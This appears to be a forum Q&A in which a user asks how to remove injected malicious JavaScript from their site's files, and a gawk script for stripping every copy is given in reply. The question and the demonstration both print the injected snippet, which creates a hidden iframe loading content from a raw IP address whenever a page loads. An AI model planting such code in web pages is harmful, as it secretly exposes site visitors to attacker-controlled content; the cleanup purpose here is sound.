My JS files have got this malicious code which I want to get rid of. So files have multiple occurances of it. Cananyone help use SED or AWK to remove it ?
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://155.94.75.92/iframe.html";
document.body.appendChild(iframe);
};
}
Save just that code segment in a file named "bad" and then run this on your infected files (uses GNU awk for multi-char RS):
awk -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected
Once you're happy it's behaving as expected after testing on 1 infected file, you can add the inplace editing flag (again gawk-only) and run it on all of your infected files at once:
awk -i inplace -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); print; next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected1 infected2 ... infectedN
wrt your command below that "it didn't work", look at it working:
$ cat bad
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://155.94.75.92/iframe.html";
document.body.appendChild(iframe);
};
}
$ cat infected
foo
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://155.94.75.92/iframe.html";
document.body.appendChild(iframe);
};
}
bar
$ awk -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected
foo
bar
